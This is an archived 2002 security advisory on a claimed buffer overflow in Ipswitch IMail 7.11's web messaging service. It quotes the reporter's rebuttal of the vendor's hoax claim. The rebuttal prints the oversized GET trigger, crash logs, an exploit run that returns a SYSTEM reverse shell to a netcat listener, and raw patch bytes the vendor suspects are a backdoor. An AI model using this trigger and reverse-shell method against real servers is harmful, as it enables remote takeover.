SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   IMail Server Vendors:   Ipswitch
(Author ReiteratesThat The Vulnerability Exists) Re: Ipswitch IMail Server Buffer Overflow in Web Messaging Daemon Lets Remote Users Execute Arbitrary Code and Gain System Level Access
SecurityTracker Alert ID:  1004872
SecurityTracker URL:  http://securitytracker.com/id/1004872
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 30 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 7.11 HF1 and prior versions
Description:   A buffer overflow vulnerability was reported in Ipswitch's IMail Server. A remote user can execute arbitrary code on the server with System level privileges.

The buffer overflow is reported in the Web Messaging daemon in the GET parameter using the HTTP/1.0 specification. The vulnerability is apparently not present when using the HTTP/0.9 and HTTP/1.1 specifications. A remote user can send a GET request with the following contents to trigger the flaw:

GET
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx
HTTP/1.0

[Editor's note: As a response to the original report, the vendor claimed that the vulnerability does not exist and that the vulnerability report may be a hoax. The author of the original report has responded to say that the vulnerability indeed exists.]

Impact:   A remote user can execute arbitrary code with System level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/IMail_Server/index.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   This archive entry is a follow-up to the message listed below.
Jul 26 2002 Ipswitch IMail Server Buffer Overflow in Web Messaging Daemon Lets Remote Users Execute Arbitrary Code and Gain System Level Access



 Source Message Contents

Subject:  Re: Hoax Exploit (2c79cbe14ac7d0b8472d3f129fa1df55 RETURNS)


uh, ok

first of all, I haven't been able to respond to any mail since saturday 
afternoon as some nice person/vendor filed a phony abuse report with the 
intelligent people of yahoo inc., and had my account suspended and banned.. 
if you sent any email since saturday, please resend it here.. I'm sure I'll 
have a week or so to read it before I am ABUSE REPORT H4XED..

first off, maybe the exploit isn't working on your system.. hmm, possible I 
guess?.. the described situation is still quite repeatable so what the hell:

xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 Created
Date: Mon, 29 Jul 2002 19:20:41 GMT
Server: Ipswitch-IMail/7.11
Last-Modified: Mon, 29 Jul 2002 19:20:41 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires:
Content-Type: text/html
Content-Length: 5143

[....]


hmm, looks like IMail 7.11 to me? how about you?


xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx 
HTTP/1.0

Connection closed by foreign host.


uh oh, that isn't supposed to happen!@ let's chex those logs!


20020729 162041 Info - 192.168.0.1   GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1   GET 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxx.
20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 
from 192.168.0.1.


hey, look mom.. a dead thread! looks like an overflow to me, let's use that 
elite exploit I found on bugtraq!@


xx@xxx:~$ ./imailexp 192.168.0.2 8383 192.168.0.1 3333
IMail 7.11 remote exploit (SYSTEM level)
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

ret: 0x10012490 (IMailsec.dll v.2.6.17.28)

connecting...done.
dumping payload...done.

cmd.exe spawned to [192.168.0.1:3333]

xx@xxx:~$ nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

D:\WINNT\system32>


seems to work fine to me.. what the hell is going on at ipswitch? is it time 
to fire someone?

as for the patch being a vulnerability.. the binary was compiled with the 
default switches using Borland C++ 5.5 so that's why it's large.. but it's 
the same damn source, so fuck the binary then.. compile from the source:

char p1[] = {0x00,0x30};
//extend text section to make room for our code

char p2[] = {0xe8,0xa1,0x98,0x04,0x00,0x90};
//on a command request, CALL 4A345E;NOP

char p3[] = 
{0x81,0xbc,0x24,0x58,0x03,0x00,0x00,0x47,0x45,0x54,0x20,0x75,0x08,0xc6,0x84,0x24,0xb2,0x03,0x00,0x00,0x00,0x8d,0x85,0xf0,0xed,0xff,0xff,0xc3};
//disassembly below

.text:004A345E                 cmp     [esp+arg_354], 20544547h
.text:004A3469                 jnz     short loc_4A3473
//is the argument "USER"? no? get out of this shit
.text:004A346B                 mov     [esp+arg_3AE], 0
//yes? limit argument to 90 bytes
.text:004A3473 loc_4A3473:                             ; CODE XREF: 
sub_4A345E+Bj
.text:004A3473                 lea     eax, [ebp-1210h]
//shit we ran over to get here
.text:004A3479                 retn

huh? looks like a backdoor to me..

@!$?@!?$@!?%2@$42144@!$@!%?@!$@!%?@!$,
2c79cbe14ac7d0b8472d3f129fa1df55


>Hello,

>In message 284465 there is an "exploit" of IMail Server from Ipswitch
>listed.

>http://online.securityfocus.com/archive/1/284465

>We have been unable to duplicate the problem and the code attached to >the 
>above message is unknown in nature.  We suspect that the "patch" >released 
>in the message is actually designed to open a vulnerability.  >At this time 
>we are advising our users that this advisory is a hoax >and to not apply 
>the patch.  I would like to request that the message >be removed to prevent 
>further confusion.  Thank you.

>John Korsak
>Product Marketing Manager, IMail Server
>(781) 676-5789



_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC